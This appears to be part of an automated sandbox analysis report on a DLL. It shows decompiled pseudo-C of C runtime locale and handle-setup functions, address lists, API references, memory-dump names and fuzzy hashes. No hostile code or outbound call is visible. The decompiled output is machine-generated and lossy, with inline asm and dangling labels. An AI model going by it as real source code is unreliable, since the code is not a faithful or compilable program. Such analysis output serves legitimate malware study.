    0x6e21c472
    0x6e21c584
    0x6e21c584
    0x6e21c584
    0x00000000
    0x6e21c478
    0x6e21c485
    0x6e21c48b
    0x00000000
    0x6e21c4bb
    0x6e21c4bb
    0x6e21c4c0
    0x6e21c4c2
    0x6e21c4c2
    0x6e21c4c4
    0x6e21c4c9
    0x6e21c57f
    0x6e21c581
    0x00000000
    0x6e21c4cf
    0x6e21c4cf
    0x6e21c4d2
    0x6e21c4d2
    0x6e21c4da
    0x6e21c4dd
    0x6e21c4e0
    0x6e21c4e0
    0x6e21c4e3
    0x6e21c4e6
    0x6e21c4ee
    0x6e21c4f3
    0x6e21c4fa
    0x6e21c4ff
    0x6e21c502
    0x6e21c504
    0x6e21c58f
    0x6e21c590
    0x6e21c591
    0x6e21c592
    0x6e21c593
    0x6e21c594
    0x6e21c599
    0x6e21c59d
    0x6e21c5a5
    0x6e21c5ac
    0x6e21c5af
    0x6e21c5b0
    0x6e21c5b4
    0x6e21c5ba
    0x6e21c5c2
    0x6e21c5d1
    0x6e21c5dd
    0x6e21c5ee
    0x6e21c5f4
    0x6e21c5f6
    0x6e21c607
    0x6e21c60e
    0x6e21c610
    0x6e21c613
    0x6e21c619
    0x6e21c61b
    0x6e21c61d
    0x6e21c61d
    0x6e21c620
    0x6e21c623
    0x6e21c623
    0x6e21c61b
    0x6e21c62d
    0x6e21c5f8
    0x6e21c5f8
    0x6e21c5fa
    0x6e21c635
    0x6e21c640
    0x6e21c50a
    0x6e21c513
    0x6e21c518
    0x6e21c51a
    0x00000000
    0x6e21c51c
    0x6e21c51e
    0x6e21c51e
    0x6e21c52a
    0x6e21c538
    0x00000000
    0x6e21c53a
    0x6e21c53a
    0x6e21c53d
    0x6e21c543
    0x6e21c546
    0x6e21c556
    0x6e21c55b
    0x6e21c569
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21c548
    0x6e21c548
    0x6e21c54b
    0x6e21c551
    0x6e21c552
    0x6e21c554
    0x6e21c56b
    0x6e21c56f
    0x6e21c577
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e21c554
    0x6e21c546
    0x6e21c538
    0x6e21c586
    0x6e21c58c
    0x6e21c58c
    0x6e21c504
    0x6e21c4c9
    0x6e21c48b

    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(?,?,6E20A016,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E211975,?,?,?,?,6E21142E,?,00000004), ref: 6E21C4AD
    • _wcschr.LIBVCRUNTIME ref: 6E21C53D
    • _wcschr.LIBVCRUNTIME ref: 6E21C54B
    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,6E211975,00000000,6E211A95), ref: 6E21C5EE
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
    • String ID:
    • API String ID: 4212172061-0
    • Opcode ID: 1cca69b54e51a3297f11a6528ec144cdd4450397191ed8c072c3ef72ccc970b9
    • Instruction ID: 0f911a7ef7034adbccae76ded460078d95cb4b0e3b15a2253b065ab50275579c
    • Opcode Fuzzy Hash: 1cca69b54e51a3297f11a6528ec144cdd4450397191ed8c072c3ef72ccc970b9
    • Instruction Fuzzy Hash: EA61D47960C20FABE7189BB5DC56BE677EEEF04B45F100839EB15DB180EB30D64086A4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21207B, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 338COMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E6E21207B(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				void** _v32;
				struct _STARTUPINFOW* _v48;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				short _v802;
				char _v852;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t167;
				void* _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t180;
				signed int _t184;
				signed int* _t185;
				struct _STARTUPINFOW* _t187;
				signed int _t191;
				void** _t192;
				signed int _t198;
				signed int _t201;
				signed int _t202;
				signed int _t204;
				signed int _t224;
				signed int _t225;
				signed int _t228;
				signed int _t233;
				signed int _t236;
				LPWSTR* _t238;
				intOrPtr* _t244;
				intOrPtr* _t245;
				void* _t256;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t266;
				signed int* _t270;
				void* _t278;
				signed char _t279;
				signed int _t281;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				signed int _t299;
				signed int* _t300;
				intOrPtr* _t301;
				short _t302;
				signed int _t303;
				void* _t305;
				void* _t306;
				void* _t307;

				_t167 =  *0x6e24b164; // 0x1dc3c76f
				_v8 = _t167 ^ _t303;
				_t236 = _a8;
				_t284 = _a4;
				_v744 = _t236;
				_v728 = E6E20FA06(_t236, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t174 = E6E2117C5(_t236, __edx, _t284, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t306 = _t305 + 0x18;
				if(_t174 != 0) {
					_t11 = _t236 + 2; // 0x6
					_t291 = _t11 << 4;
					__eflags = _t291;
					_t175 =  &_v272;
					_v716 = _t291;
					_t244 =  *((intOrPtr*)(_t291 + _t284));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t175 -  *_t244;
						_t293 = _v716;
						if( *_t175 !=  *_t244) {
							break;
						}
						__eflags =  *_t175;
						if( *_t175 == 0) {
							L8:
							_t176 = _v704;
						} else {
							_t302 =  *((intOrPtr*)(_t175 + 2));
							__eflags = _t302 -  *((intOrPtr*)(_t244 + 2));
							_v710 = _t302;
							_t293 = _v716;
							if(_t302 !=  *((intOrPtr*)(_t244 + 2))) {
								break;
							} else {
								_t175 = _t175 + 4;
								_t244 = _t244 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t176;
						if(_t176 != 0) {
							_t245 =  &_v272;
							_t278 = _t245 + 2;
							do {
								_t177 =  *_t245;
								_t245 = _t245 + 2;
								__eflags = _t177 - _v704;
							} while (_t177 != _v704);
							_v720 = (_t245 - _t278 >> 1) + 1;
							_t180 = E6E20FBEC(_t245 - _t278 >> 1, 4 + ((_t245 - _t278 >> 1) + 1) * 2);
							_v732 = _t180;
							__eflags = _t180;
							if(_t180 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t293 + _t284));
								_t35 = _t236 * 4; // 0x8496
								_v736 =  *((intOrPtr*)(_t284 + _t35 + 0xa0));
								_t38 = _t284 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t254 =  &_v272;
								_v712 = _t180 + 4;
								_t184 = E6E20D69C(_t180 + 4, _v720,  &_v272);
								_t307 = _t306 + 0xc;
								__eflags = _t184;
								if(_t184 != 0) {
									_t185 = _v728;
									_push(_t185);
									_push(_t185);
									_push(_t185);
									_push(_t185);
									_push(_t185);
									E6E208956();
									asm("int3");
									_push(_t303);
									_t187 =  &_v852;
									GetStartupInfoW(_t187);
									__eflags = _v802;
									if(_v802 != 0) {
										_t187 = _v48;
										__eflags = _t187;
										if(_t187 != 0) {
											_push(_t236);
											_push(_t293);
											_t295 = _t187->cb;
											_t238 =  &(_t187->lpReserved);
											_v32 = _t238 + _t295;
											__eflags = _t295 - 0x2000;
											if(__eflags >= 0) {
												_t295 = 0x2000;
											}
											_push(_t295);
											E6E213E39(_t254, _t278, __eflags);
											_t191 =  *0x6e2e38b0; // 0x40
											__eflags = _t295 - _t191;
											if(_t295 > _t191) {
												_t295 = _t191;
											}
											_push(_t284);
											_t286 = 0;
											__eflags = _t295;
											if(_t295 == 0) {
												L61:
												return _t191;
											} else {
												_t192 = _v32;
												do {
													_t256 =  *_t192;
													__eflags = _t256 - 0xffffffff;
													if(_t256 == 0xffffffff) {
														goto L60;
													}
													__eflags = _t256 - 0xfffffffe;
													if(_t256 == 0xfffffffe) {
														goto L60;
													}
													_t279 =  *_t238;
													__eflags = _t279 & 0x00000001;
													if((_t279 & 0x00000001) == 0) {
														goto L60;
													}
													__eflags = _t279 & 0x00000008;
													if((_t279 & 0x00000008) != 0) {
														L58:
														_t281 = (_t286 & 0x0000003f) * 0x30 +  *((intOrPtr*)(0x6e2e36b0 + (_t286 >> 6) * 4));
														__eflags = _t281;
														 *(_t281 + 0x18) =  *_v32;
														 *((char*)(_t281 + 0x28)) =  *_t238;
														L59:
														_t192 = _v32;
														goto L60;
													}
													_t198 = GetFileType(_t256);
													__eflags = _t198;
													if(_t198 == 0) {
														goto L59;
													}
													goto L58;
													L60:
													_t286 = _t286 + 1;
													_t192 =  &(_t192[1]);
													_t238 =  &(_t238[0]);
													_v32 = _t192;
													__eflags = _t286 - _t295;
												} while (_t286 != _t295);
												goto L61;
											}
										}
									}
									return _t187;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t293 + _t284)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t201 = E6E211534(_t236, _t254, _t284,  &_v700);
										_t260 = _v704;
										 *(_t284 + 0xa0 + _t236 * 4) = _t201;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t260 = _v704;
											 *(_t284 + 0xa0 + _t236 * 4) = _t260;
										}
									}
									__eflags = _t236 - 2;
									if(_t236 != 2) {
										__eflags = _t236 - 1;
										if(_t236 != 1) {
											__eflags = _t236 - 5;
											if(_t236 == 5) {
												 *((intOrPtr*)(_t284 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t284 + 0x10)) = _v708;
										}
									} else {
										_t300 = _v728;
										_t282 = _t260;
										_t270 = _t300;
										 *(_t284 + 8) = _v708;
										_v712 = _t300;
										_v720 = _t300[8];
										_v708 = _t300[9];
										while(1) {
											_t64 = _t284 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t270;
											if( *_t64 ==  *_t270) {
												break;
											}
											_t301 = _v712;
											_t282 = _t282 + 1;
											_t233 =  *_t270;
											 *_t301 = _v720;
											_v708 = _t270[1];
											_t270 = _t301 + 8;
											 *((intOrPtr*)(_t301 + 4)) = _v708;
											_t236 = _v744;
											_t300 = _v728;
											_v720 = _t233;
											_v712 = _t270;
											__eflags = _t282 - 5;
											if(_t282 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t282 - 5;
											if(__eflags == 0) {
												_t88 = _t284 + 8; // 0x8b56ff8b
												_t224 = E6E215C7C(_t236, _t284, _t300, __eflags, _v704, 1, 0x6e23f9e8, 0x7f,  &_v528,  *_t88, 1);
												_t307 = _t307 + 0x1c;
												__eflags = _t224;
												_t225 = _v704;
												if(_t224 == 0) {
													_t300[1] = _t225;
												} else {
													do {
														 *(_t303 + _t225 * 2 - 0x20c) =  *(_t303 + _t225 * 2 - 0x20c) & 0x000001ff;
														_t225 = _t225 + 1;
														__eflags = _t225 - 0x7f;
													} while (_t225 < 0x7f);
													_t228 = E6E205FDD( &_v528,  *0x6e24b2d4, 0xfe);
													_t307 = _t307 + 0xc;
													__eflags = _t228;
													_t300[1] = 0 | _t228 == 0x00000000;
												}
												_t103 = _t284 + 8; // 0x8b56ff8b
												 *_t300 =  *_t103;
											}
											 *(_t284 + 0x18) = _t300[1];
											goto L38;
										}
										__eflags = _t282;
										if(_t282 != 0) {
											 *_t300 =  *(_t300 + _t282 * 8);
											_t300[1] =  *(_t300 + 4 + _t282 * 8);
											 *(_t300 + _t282 * 8) = _v720;
											 *(_t300 + 4 + _t282 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t202 = _t236 * 0xc;
									_t110 = _t202 + 0x6e23f928; // 0x6e202dcb
									 *0x6e2211c4(_t284); // executed
									_t204 =  *((intOrPtr*)( *_t110))(); // executed
									_t263 = _v724;
									__eflags = _t204;
									if(_t204 == 0) {
										__eflags = _t263 - 0x6e24b3a0;
										if(_t263 != 0x6e24b3a0) {
											_t299 = _t236 + _t236;
											__eflags = _t299;
											asm("lock xadd [eax], ecx");
											if(_t299 != 0) {
												goto L43;
											} else {
												_t128 = _t299 * 8; // 0x30ff068b
												E6E20FBB2( *((intOrPtr*)(_t284 + _t128 + 0x28)));
												_t131 = _t299 * 8; // 0x30ff0c46
												E6E20FBB2( *((intOrPtr*)(_t284 + _t131 + 0x24)));
												_t134 = _t236 * 4; // 0x8496
												E6E20FBB2( *((intOrPtr*)(_t284 + _t134 + 0xa0)));
												_t266 = _v704;
												 *((intOrPtr*)(_v716 + _t284)) = _t266;
												 *(_t284 + 0xa0 + _t236 * 4) = _t266;
											}
										}
										_t264 = _v732;
										 *_t264 = 1;
										 *((intOrPtr*)(_t284 + 0x28 + (_t236 + _t236) * 8)) = _t264;
									} else {
										 *(_v716 + _t284) = _t263;
										_t115 = _t236 * 4; // 0x8496
										E6E20FBB2( *((intOrPtr*)(_t284 + _t115 + 0xa0)));
										 *(_t284 + 0xa0 + _t236 * 4) = _v736;
										E6E20FBB2(_v732);
										 *(_t284 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L63;
					}
					asm("sbb eax, eax");
					_t176 = _t175 | 0x00000001;
					__eflags = _t176;
					goto L10;
				} else {
					L1:
					L2:
					return E6E203D51(_v8 ^ _t303);
				}
				L63:
			}










































































    0x6e212086
    0x6e21208d
    0x6e212091
    0x6e212099
    0x6e21209c
    0x6e2120ac
    0x6e2120b8
    0x6e2120cf
    0x6e2120d4
    0x6e2120d9
    0x6e2120ee
    0x6e2120f1
    0x6e2120f1
    0x6e2120f4
    0x6e2120fa
    0x6e212103
    0x6e212105
    0x6e212108
    0x6e21210f
    0x6e212112
    0x6e212118
    0x00000000
    0x00000000
    0x6e21211a
    0x6e21211e
    0x6e212147
    0x6e212147
    0x6e212120
    0x6e212120
    0x6e212124
    0x6e212128
    0x6e21212f
    0x6e212135
    0x00000000
    0x6e212137
    0x6e212137
    0x6e21213a
    0x6e21213d
    0x6e212145
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e212145
    0x6e212135
    0x6e212154
    0x6e212154
    0x6e212156
    0x6e21215c
    0x6e212162
    0x6e212165
    0x6e212165
    0x6e212168
    0x6e21216b
    0x6e21216b
    0x6e21217b
    0x6e212189
    0x6e21218e
    0x6e212195
    0x6e212197
    0x00000000
    0x6e21219d
    0x6e2121a3
    0x6e2121a9
    0x6e2121b0
    0x6e2121b6
    0x6e2121b9
    0x6e2121bf
    0x6e2121cc
    0x6e2121d3
    0x6e2121d8
    0x6e2121db
    0x6e2121dd
    0x6e212436
    0x6e21243c
    0x6e21243d
    0x6e21243e
    0x6e21243f
    0x6e212440
    0x6e212441
    0x6e212446
    0x6e212449
    0x6e21244f
    0x6e212453
    0x6e212459
    0x6e21245e
    0x6e212464
    0x6e212467
    0x6e212469
    0x6e21246f
    0x6e212470
    0x6e212471
    0x6e212473
    0x6e212479
    0x6e212481
    0x6e212483
    0x6e212485
    0x6e212485
    0x6e212487
    0x6e212488
    0x6e21248d
    0x6e212493
    0x6e212495
    0x6e212497
    0x6e212497
    0x6e212499
    0x6e21249a
    0x6e21249c
    0x6e21249e
    0x6e2124f6
    0x00000000
    0x6e2124a0
    0x6e2124a0
    0x6e2124a3
    0x6e2124a3
    0x6e2124a5
    0x6e2124a8
    0x00000000
    0x00000000
    0x6e2124aa
    0x6e2124ad
    0x00000000
    0x00000000
    0x6e2124af
    0x6e2124b1
    0x6e2124b4
    0x00000000
    0x00000000
    0x6e2124b6
    0x6e2124b9
    0x6e2124c6
    0x6e2124d6
    0x6e2124d6
    0x6e2124df
    0x6e2124e4
    0x6e2124e7
    0x6e2124e7
    0x00000000
    0x6e2124e7
    0x6e2124bc
    0x6e2124c2
    0x6e2124c4
    0x00000000
    0x00000000
    0x00000000
    0x6e2124ea
    0x6e2124ea
    0x6e2124eb
    0x6e2124ee
    0x6e2124ef
    0x6e2124f2
    0x6e2124f2
    0x00000000
    0x6e2124a3
    0x6e21249e
    0x6e212469
    0x6e2124fc
    0x6e2121e3
    0x6e2121e3
    0x6e2121f1
    0x6e2121f4
    0x6e21220f
    0x6e212216
    0x6e21221c
    0x6e212222
    0x6e2121f6
    0x6e2121f6
    0x6e2121fe
    0x00000000
    0x6e212200
    0x6e212200
    0x6e212206
    0x6e212206
    0x6e2121fe
    0x6e212229
    0x6e21222c
    0x6e212349
    0x6e21234c
    0x6e212359
    0x6e21235c
    0x6e212364
    0x6e212364
    0x6e21234e
    0x6e212354
    0x6e212354
    0x6e212232
    0x6e212232
    0x6e212238
    0x6e212240
    0x6e212242
    0x6e212245
    0x6e21224e
    0x6e212257
    0x6e21225d
    0x6e21225d
    0x6e212260
    0x6e212262
    0x00000000
    0x00000000
    0x6e212264
    0x6e21226a
    0x6e21226b
    0x6e212276
    0x6e21227e
    0x6e212286
    0x6e212289
    0x6e21228c
    0x6e212292
    0x6e212298
    0x6e21229e
    0x6e2122a4
    0x6e2122a7
    0x00000000
    0x00000000
    0x6e2122a9
    0x6e2122ce
    0x6e2122ce
    0x6e2122d1
    0x6e2122d5
    0x6e2122ee
    0x6e2122f3
    0x6e2122f6
    0x6e2122f8
    0x6e2122fe
    0x6e212339
    0x6e212300
    0x6e212300
    0x6e212305
    0x6e21230d
    0x6e21230e
    0x6e21230e
    0x6e212325
    0x6e21232c
    0x6e21232f
    0x6e212334
    0x6e212334
    0x6e21233c
    0x6e21233f
    0x6e21233f
    0x6e212344
    0x00000000
    0x6e212344
    0x6e2122ab
    0x6e2122ad
    0x6e2122b2
    0x6e2122b8
    0x6e2122c1
    0x6e2122ca
    0x6e2122ca
    0x00000000
    0x6e2122ad
    0x6e212367
    0x6e212367
    0x6e21236b
    0x6e212373
    0x6e212379
    0x6e21237c
    0x6e212382
    0x6e212384
    0x6e2123c4
    0x6e2123ca
    0x6e2123d1
    0x6e2123d1
    0x6e2123d7
    0x6e2123db
    0x00000000
    0x6e2123dd
    0x6e2123dd
    0x6e2123e1
    0x6e2123e6
    0x6e2123ea
    0x6e2123ef
    0x6e2123f6
    0x6e212404
    0x6e21240a
    0x6e21240d
    0x6e21240d
    0x6e2123db
    0x6e21241c
    0x6e212424
    0x6e21242d
    0x6e212386
    0x6e21238c
    0x6e21238f
    0x6e212396
    0x6e2123a8
    0x6e2123af
    0x6e2123bc
    0x00000000
    0x6e2123bc
    0x00000000
    0x6e212384
    0x6e2121dd
    0x6e212158
    0x00000000
    0x6e212158
    0x00000000
    0x6e212156
    0x6e21214f
    0x6e212151
    0x6e212151
    0x00000000
    0x6e2120db
    0x6e2120db
    0x6e2120dd
    0x6e2120ed
    0x6e2120ed
    0x00000000

    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(?,?,6E20A016,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
      • Part of subcall function 6E20FA06: SetLastError.KERNEL32(00000000,6E249300,0000000C,6E1F9063,6E2000BE,?,00000001,?,?,?,?,?,?,?,6E200044), ref: 6E20FA7E
      • Part of subcall function 6E20FA06: _abort.LIBCMT ref: 6E20FA84
    • _memcmp.LIBVCRUNTIME ref: 6E212325
    • _free.LIBCMT ref: 6E212396
    • _free.LIBCMT ref: 6E2123AF
    • _free.LIBCMT ref: 6E2123E1
    • _free.LIBCMT ref: 6E2123EA
    • _free.LIBCMT ref: 6E2123F6
    • GetStartupInfoW.KERNEL32(?), ref: 6E212453
    • GetFileType.KERNEL32(?,6E21142E,?,00000004), ref: 6E2124BC
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
    • String ID: C
    • API String ID: 1665419104-1037565863
    • Opcode ID: b31a131a9e4216546b522ff7652453d6f0ec45a673db6b625b8e605fb1d98da3
    • Instruction ID: 73c8824c82be70c9eb7f83ab1fb2f4e2d83951ec96ac474735085808f828b446
    • Opcode Fuzzy Hash: b31a131a9e4216546b522ff7652453d6f0ec45a673db6b625b8e605fb1d98da3
    • Instruction Fuzzy Hash: 5ED15DB6A0521ADFDB24CF58C894ADDB7F6FB49304F10459AE949A7350D731AE80CF40
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21B4B3, Relevance: 10.7, APIs: 7, Instructions: 204COMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E6E21B4B3(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E6E20FB55(_t101, 1, 0x50); // executed
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E6E20FBEC(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E6E20FBB2(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x6e24b1a8; // 0x6e24b1a0
								 *_t133 = _t57;
								_t58 =  *0x6e24b1ac; // 0x6e2e3408
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x6e24b1b0; // 0x6e2e3408
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x6e24b1d8; // 0x6e24b1a4
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x6e24b1dc; // 0x6e2e340c
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E6E20FBEC(_t107, 4);
							_v20 = _t134;
							E6E20FBB2(0);
							if(_t134 == 0) {
								L11:
								E6E20FBB2(_v8);
								E6E20FBB2(_v12);
								return _v16;
							}
							_push(_v8);
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E6E215ACA(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134);
							_t136 = _t135 | E6E215ACA(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xf, _v8 + 4,  &_v28);
							_v16 = _v8 + 8;
							_t137 = _t136 | E6E215ACA(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8, 1);
							_t138 = _t137 | E6E215ACA(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30, _t128);
							if((E6E215ACA(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34, 0xe) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E6E21B44A(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E6E20FBB2(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x6e24b1a8;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E6E20FBB2( *((intOrPtr*)(_t100 + 0x7c)));
							E6E20FBB2( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}



































    0x6e21b4b3
    0x6e21b4bc
    0x6e21b4c3
    0x6e21b4c6
    0x6e21b4cf
    0x6e21b4ee
    0x6e21b4f1
    0x6e21b4f6
    0x6e21b4fd
    0x6e21b510
    0x6e21b511
    0x6e21b51a
    0x6e21b51c
    0x6e21b51f
    0x6e21b522
    0x6e21b528
    0x6e21b52b
    0x6e21b53e
    0x6e21b546
    0x6e21b6a0
    0x6e21b6a3
    0x6e21b6a8
    0x6e21b6aa
    0x6e21b6af
    0x6e21b6b2
    0x6e21b6b7
    0x6e21b6ba
    0x6e21b6bf
    0x6e21b6c2
    0x6e21b6c7
    0x6e21b630
    0x6e21b636
    0x6e21b63a
    0x6e21b63c
    0x6e21b63c
    0x00000000
    0x6e21b63a
    0x6e21b553
    0x6e21b556
    0x6e21b559
    0x6e21b562
    0x6e21b5f7
    0x6e21b5fa
    0x6e21b603
    0x00000000
    0x6e21b60c
    0x6e21b568
    0x6e21b56b
    0x6e21b570
    0x6e21b584
    0x6e21b598
    0x6e21b5a4
    0x6e21b5b2
    0x6e21b5cc
    0x6e21b5e8
    0x6e21b612
    0x6e21b625
    0x6e21b616
    0x6e21b61a
    0x6e21b68d
    0x00000000
    0x00000000
    0x6e21b68f
    0x6e21b691
    0x6e21b694
    0x6e21b696
    0x6e21b699
    0x6e21b620
    0x6e21b622
    0x6e21b624
    0x6e21b624
    0x6e21b624
    0x6e21b61a
    0x6e21b62a
    0x6e21b62d
    0x00000000
    0x6e21b62d
    0x6e21b5ed
    0x6e21b5f2
    0x00000000
    0x6e21b5f6
    0x6e21b530
    0x00000000
    0x6e21b538
    0x00000000
    0x6e21b4d9
    0x6e21b4d9
    0x6e21b4db
    0x6e21b4de
    0x6e21b63e
    0x6e21b63e
    0x6e21b646
    0x6e21b648
    0x6e21b648
    0x6e21b650
    0x6e21b655
    0x6e21b659
    0x6e21b65e
    0x6e21b669
    0x6e21b66f
    0x6e21b659
    0x6e21b673
    0x6e21b678
    0x6e21b67e
    0x00000000
    0x6e21b67e

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.572384717.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000004.00000002.572373744.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572587872.000000006E221000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.572727279.000000006E24B000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572750992.000000006E24D000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572788435.000000006E2E2000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.572812852.000000006E2E4000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: f7972dfc6533321bed0b73b4875cc6051ddca2adf268a28eb4183ed722944d7e
    • Instruction ID: dc2c872d70c29e1c21d0dc7fbfbd17dc6ee77e6557bef06f2908ede179b64193
    • Opcode Fuzzy Hash: f7972dfc6533321bed0b73b4875cc6051ddca2adf268a28eb4183ed722944d7e
